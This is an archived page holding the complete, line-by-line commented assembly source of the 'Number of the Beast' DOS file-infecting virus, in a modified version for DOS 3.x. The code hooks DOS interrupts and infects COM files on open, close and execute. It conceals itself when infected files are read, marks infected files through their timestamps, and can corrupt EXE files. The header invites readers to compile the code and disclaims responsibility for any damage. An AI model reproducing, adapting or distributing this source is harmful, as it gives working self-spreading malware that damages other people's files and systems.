home *** CD-ROM | disk | FTP | other *** search
- ;*******************************************************************************
-
- ;* *
-
- ;* THE NUMBER OF THE BEAST VIRUS *
-
- ;* *
-
- ;* This is NOT a original virus, but a modification. Main difference *
-
- ;* between original virus is, that this release support ANY DOS version *
-
- ;* above 3.00 and below 4.00 (3.10, 3.20 and 3.30). *
-
- ;* *
-
- ;* Modification (C) were made by *
-
- ;* *
-
- ;* Kiril Stoimenov & Stephen Genchev *
-
- ;* *
-
- ;* Source was (C) commented by *
-
- ;* Waleri Todorov, CICTT, 07 Mar 1991 20:30 *
-
- ;* *
-
- ;* All Rights Reserved. *
-
- ;* *
-
- ;*******************************************************************************
-
- ;* *
-
- ;* We don't care about any damages caused by compiling and runnig *
-
- ;* of this program. Use it only at your responsible ! *
-
- ;* *
-
- ;* If you find any mistakes or inaccurates in this source or comments, *
-
- ;* please, let us know. Drop message for Waleri Todorov on Virus eXchange *
-
- ;* BBS, (+359+2) 20-41-98 or send Email to FidoNet 2:359/105.100 *
-
- ;* *
-
- ;* Waleri Todorov *
-
- ;* *
-
- ;*******************************************************************************
-
- org 0
-
-
-
- mov ah,30h ; Get DOS version
-
- int 21h
-
- xchg ah,al ; Swap major and minor digit
-
- cmp ax,31Eh ; Is DOS==3.30
-
- mov si,7B4h ; Load offset of original int13
-
- jae newdos ; If 3.30+ -> Proceed
-
- mov si,10A5h ; Load offset of original int13
-
- cmp al,10 ; Check for 3.10
-
- je newdos ; If so -> proceed
-
- mov si,1EC9h ; Load offset of original int13 for other DOS's
-
- newdos: mov ds,cx ; This may cause trouble, because CX
-
- ; is NOT allways set to ZERO
-
- mov di,0F8h ; ES:DI will point to PSP:00F8 - unused area
-
- movsw ; Save oroginal int13 vector
-
- movsw ; to unused area in PSP
-
- mov si,84h ; DS:SI point to 0000:0084 - int21 vector
-
- movsw ; Save current int21 vector
-
- movsw ; to unused area in PSP
-
- lds ax,dword ptr [si-4] ; Load DS:AX with current address of int21
-
- push es ; Save ES
-
- push di ; Save DI
-
- mov si,8 ; DS:SI point in current int21 handler;
-
- mov ch,1 ; CX=100h - As I said CX is not allways set to 0
-
- repz cmpsw ; Check if virus v512 hold the int21 vector
-
- push cs ;
-
- pop ds ; Set DS to PSP
-
- jz SkipInstall ; If virus is active -> SkipInstall
-
-
-
- mov ah,52h
-
- int 21h ; Get DOS table of table address
-
- push es ; Save segment of table
-
- mov si,00F8h ; DS:SI point virus WITH data area in PSP
-
- sub di,di ; This will be offset in DOS buffer
-
- les ax,dword ptr es:[bx+12h] ; Load address of first
-
- ; DOS buffer from table of tables
-
- ; This is the reason why virus
-
- ; will NOT work on DOS 4.X+
-
-
-
- mov dx,es:[di+02] ; Load in DX segment of next DOS buffer
-
- mov cx,0104h ; CX set to virus size (208h bytes)
-
- repz movsw ; Move itself in DOS buffer
-
- mov ds,cx ; Now CX is 0 so DS also become 0
-
- mov di,0016h ; This will be used for finding parent PSP
-
- mov word ptr [di+06Eh],offset int21+8 ; Set new int21 offset
-
- mov [di+70h],es ; Set new int21 segment
-
-
-
- pop ds ; Restore segment of table in DS
-
- mov [bx+14h],dx ; Set pointer to first buffer point NEXT buffer in chain
-
-
-
- mov dx,cs ; DX is current PSP segment
-
- mov ds,dx ; DS also
-
- mov bx,[di-14h] ; Load LAST segment available
-
- dec bh ; LastSegment-=0x0100
-
- mov es,bx ; ES point in transit COMMAND.COM area
-
- cmp dx,[di] ; Compare current PSP with COMMAND's parent PSP
-
- mov ds,[di] ; Load in DS segment of parent of COMMAND
-
- mov dx,[di] ; Load in DX parent of parent of COMMAND
-
- dec dx ; Decrement loaded segment
-
- mov ds,dx ; Set DS to rezult
-
- mov si,cx ; DS:SI point to XXXX:0000 -> Name of boot command
-
- mov dx,di ; Save DI in DX
-
- mov cl,28h ; Will move 80 bytes
-
- repz movsw ; Do moving
-
- mov ds,bx ; Set DS to transit COMMAND.COM segment
-
-
-
- jb RunProcess ; If current process is less than parent
-
- ; then COMMAND strat in progress -> read original bytes
-
-
-
- int 20h ; Else stop. File will run from decond start
-
- ; If this instruction will be replaced by
-
- ; PUSH CS; POP DS file will run from first time
-
-
-
- SkipInstall: mov si,cx ; Set SI to 0
-
- mov ds,[si+02Ch] ; Load in DS segment of envirement
-
- SearchAgain: lodsw ; Load word from envirement
-
- dec si ; Decrement envirement pointer
-
- test ax,ax ; Test for zero in AX
-
- jnz SearchAgain ; If not zero -> SearchAgain
-
- add si,3 ; Else SI+=3; Now DS:SI point to filename in env
-
- mov dx,si ; DS:DX point to filename for open
-
- RunProcess: mov ah,03Dh ; AH = 3D - Open file; Don't care about open mode
-
- call CallDosGet ; Call int21 & get handle table address in DS:DI
-
- mov dx,[di] ; Load file size in DX
-
- mov [di+04],dx ; Set file pointer to end of file
-
- add [di],cx ; Increase file size with 512 bytes
-
- pop dx ; Restore file entry point (100h) to DX
-
- ; This used for reading original bytes
-
- ; of file at normal place
-
- push dx ; Save entry point again
-
- push cs ; Set ES point to virus segment
-
- pop es ;
-
- push cs ; Set DS point to virus segment
-
- pop ds ;
-
- push ds ; Save PSP segment
-
- mov al,50h ; Push 50h. On stack is far address PSP:0050
-
- ; This are INT 21; RETF instructions
-
- push ax ; Update returning address
-
- mov ah,03Fh ; Set AH=3F - read file
-
- retf ; Far return; Read original file
-
- ; and return control to it
-
- CallDosGet: int 21h ; Open file; Open procedure will go trough virus
-
- jc ErrorOpen ; If error occur -> Skip open
-
- mov bx,ax ; Move file pointer in BX
-
- ; This could be XCHG AX,BX; that save 1 byte
-
-
-
- GetHandleAddr: push bx ; Save file handle in stack
-
- mov ax,1220h ; Get handle's table number
-
- int 02Fh ; Via int 2F (undocumented)
-
- mov bl,es:[di] ; Load table number in BL
-
- mov ax,1216h ; Get handle table ADDRESS (ES:DI)
-
- int 02Fh ; Via int 2F (undocumented)
-
- pop bx ; Restore file handle from stack
-
- push es ; Set DS to point table's segment
-
- pop ds ;
-
- add di,11h ; DI will point file's size entry intable
-
- mov cx,0200h ; CX set to virus size
-
- ErrorOpen: ret
-
- ReadClean: sti ; Disable external interrupts request
-
- push es ; Save important registers to stack
-
- push si
-
- push di
-
- push bp
-
- push ds ; Data buffer segment
-
- push cx ; Bytes to read
-
- call GetHandleAddr ; Get file handle's table address in DS:DI
-
- mov bp,cx ; Save virus size in BP
-
- mov si,[di+04] ; Save in SI current file pointer
-
- pop cx ; Restore bytes to be readed in CX
-
- pop ds ; Restore buffer segment
-
- call ReadOriginal ; Open file with original int21
-
- jc SkipClean ; If error while read -> skip cleaning
-
- cmp si,bp ; Check if file pointer was in virus
-
- jnb SkipClean ; If no -> nothing to clean
-
- push ax ; Save readed bytes
-
- mov al,es:[di-04] ; Load AL with file time
-
- not al ;
-
- and al,01Fh ; Mask seconds of file time
-
- jnz SkipCleanPop ; If time is NOT 31 sec -> nothing to do
-
- add si,es:[di] ; Add to current pointer file size
-
- ; Now SI point to requested offset,
-
- ; BUT in original file bytes
-
-
-
- xchg si,es:[di+04] ; Set new file pointer and save old file pointer
-
- add es:[di],bp ; Increase file size with virus size
-
- call ReadOriginal ; Open file via original int21
-
- mov es:[di+04],si ; Restor file pointer
-
- lahf ; ??? I don't know. If you do let me know
-
- sub es:[di],bp ; Decrease file size with virus size
-
- sahf ; ??? I don't know. If you do let me know
-
- SkipCleanPop: pop ax ; Restore readed bytes
-
-
-
- SkipClean: pop bp ; Restore saved imortant register
-
- pop di
-
- pop si
-
- pop es
-
- db 0CAh, 2, 0 ; RETF 2
-
-
-
- ReadOriginal: mov ah,03Fh
-
- CallDOS: pushf
-
- push cs
-
- call JumpDOS
-
- ret
-
- ; Following few bytes are int21 handler. They check if file is open close or
-
- ; executed and clean or infect file with virus. Here there is serious problem -
-
- ; from time to time virus infect file which is NOT COM file (EXE file will be
-
- ; destroyed, by the way).
-
- ; More about this later in comments
-
-
-
-
-
- int21: cmp ah,03Fh ; If function is Read file
-
- jz ReadClean ; then go and read original bytes
-
-
-
- push ds ; Save important registers
-
- push es
-
- push ax
-
- push bx
-
- push cx
-
- push dx
-
- push si
-
- push di
-
- cmp ah,03Eh ; If function is Close file
-
- jz CloseInfect ; then Close and Infect
-
- cmp ax,04B00h ; If execute file
-
- mov ah,03Dh ; then open file before execute
-
- ; After opening file will be closed
-
- ; and .... Infected
-
- jz Infect ;
-
- TerminateInt: pop di ; Restore important registers
-
- pop si
-
- pop dx
-
- pop cx
-
- pop bx
-
- pop ax
-
- pop es
-
- pop ds
-
- JumpDOS: jmp dword ptr cs:[0004] ; Jump to original int21
-
-
-
- CloseInfect: mov ah,45h
-
- Infect: call CallDosGet ; Duplicate file handler
-
- jc TerminateInt ; If error -> terminate
-
- sub ax,ax ; Set AX to 0
-
- mov [di+04],ax ; Set file pointer to 0
-
- mov byte ptr [di-0Fh],02 ; Set file open mode to Read/Write
-
- cld
-
- mov ds,ax ; Set DS point to interrupt table
-
- mov si,004Ch ; SI point to int13 offset
-
- lodsw ; Load int13 offset
-
- push ax ; and save it in stack
-
- lodsw ; Load int13 segment
-
- push ax ; and save it in stack
-
- push [si+40h] ; Save int24 offset
-
- push [si+42h] ; Save int24 segment
-
- lds dx,dword ptr cs:[si-50h] ; Load DS:DX with BIOS int13
-
- mov ax,2513h ; and set it via DOS function SetVector
-
- int 21h ;
-
- push cs ; Set DS point to virus segment
-
- pop ds ;
-
- mov dx,offset int24+8 ; Load in DX offset of int24 handler
-
- mov al,24h ; Set int24 vector
-
- int 21h ; via DOS function SetVector
-
- push es ; Set DS point to handle table segment
-
- pop ds ;
-
- mov al,[di-04] ; Load AL with file time
-
-
-
- ; As I said in some case virus will infect non-COM file. This may happend
-
- ; if file you work with has time set to 62 seconds. In this case virus infect
-
- ; file without checking filename. This WILL damage EXE file. DOS will treat
-
- ; this files as COM files, but usualy their size is bigger than 64K, so DOS
-
- ; cannot run it. If file is less than 64K then virus run and read original
-
- ; bytes. Usualy he DO read them, then skip control to these bytes. In EXE
-
- ; files this is EXEheader, so execution FAIL (your system CRASH)
-
-
-
-
-
- and al,01Fh ; Mask seconds
-
- cmp al,01Fh ; Check if seconds == 31 (62sec)
-
- jz NoNameCheck ; If so -> infect with no name check
-
- mov ax,[di+17h] ; Load AX with first 2 letters of file extension
-
- sub ax,04F43h ; If file is NOT *.CO?
-
- jnz SkipInfect ; SkipInfect
-
-
-
- NoNameCheck: xor [di-04],al ; Set file seconds to 31 (62sec)
-
- mov ax,[di] ; Set AX to file size
-
- cmp ax,cx ; Check file size and virus size
-
- jb SkipInfect ; If file is less than 512 bytes -> Don't infect
-
- add ax,cx ; Increase file size with virus size
-
- jc SkipInfect ; If file is bigger than (65535-512) -> no infect
-
- test byte ptr [di-0Dh],04 ; Check file attribute
-
- jnz SkipInfect ; If SYSTEM file -> don't infect it
-
- lds si,dword ptr [di-0Ah] ; Load DS:SI with device header
-
- dec ax ; AX (file size with virus) --
-
- shr ah,1 ; AX/=2
-
- and ah,[si+04] ; Check if enough place in cluster behind file
-
- jz SkipInfect ; If no place -> terminate infection
-
- mov ax,0020h ; DS = 20 (Second part of int table)
-
- mov ds,ax ;
-
- sub dx,dx ; DS:DX point to virus transfer buffer
-
- call ReadOriginal ; Open file with original int21
-
- mov si,dx ; Save virus buffer offset in SI
-
- push cx ; Save virus size
-
- LoopCheck: lodsb
-
- cmp al,cs:[si+07] ; Compare readed data with virus code
-
- jnz WriteFile ; If at least ONE byte different -> fuck file
-
- loop LoopCheck ; Check all virus code with buffer
-
- pop cx ; Restore virus size
-
- SetFileTime: or byte ptr es:[di-04],01Fh ; Set file time to 62sec
-
- NoUpdateTime: or byte ptr es:[di-0Bh],40h ; Set flag in device info word
-
-
-
- ; In case of file this is flag area. Setting bit 14
-
- ; as virus does, mean for DOS "Don't set file date/time when close"
-
- ; DOS always rewrite Date/Time field of table. If bit 14 is clear (0)
-
- ; then DOS will set current time to file. Virus should avoid this, or
-
- ; DOS will overwrite seconds field and they (seconds) will be normal
-
-
-
- SkipInfect: mov ah,03Eh ; Close file
-
- call CallDOS ; via original int21
-
- or byte ptr es:[di-0Ch],40h ; Set flag... See above
-
- pop ds ; Restore original int24
-
- pop dx
-
- mov ax,2524h ; via SetVector
-
- int 21h
-
- pop ds ; Restore original int13
-
- pop dx
-
- mov al,13h ; via SetVector
-
- int 21h
-
- jmp TerminateInt ; All done, jump to DOS
-
-
-
- WriteFile: pop cx ; Restore virus size to CX
-
- mov si,es:[di] ; Save current file size in SI
-
- mov es:[di+04],si ; Move file pointer at the end of file
-
- mov ah,40h ; Write to file its first 512 bytes at the end
-
- int 21h
-
- jc NoUpdateTime ; If error occur file time will be normal
-
- mov es:[di],si ; Set file size to be as before (file size
-
- ; will remain unchanged)
-
- mov es:[di+04],dx ; Set file pointer to beginning of file
-
- push cs ; Set DS:DX point to virus
-
- pop ds ;
-
- mov dl,08 ; Skip first 8 bytes of virus, because they
-
- ; are a buffer for int handlers adresses
-
- mov ah,40h ; Write virus at the beginning of file
-
- int 21h ;
-
- jmp SetFileTime ; File now OK infected, so his time must be
-
- ; set to 62 sec
-
- int24: iret ; int 24 handler. Avoid "Write protected error..."
-
- db '666' ; Virus signature
-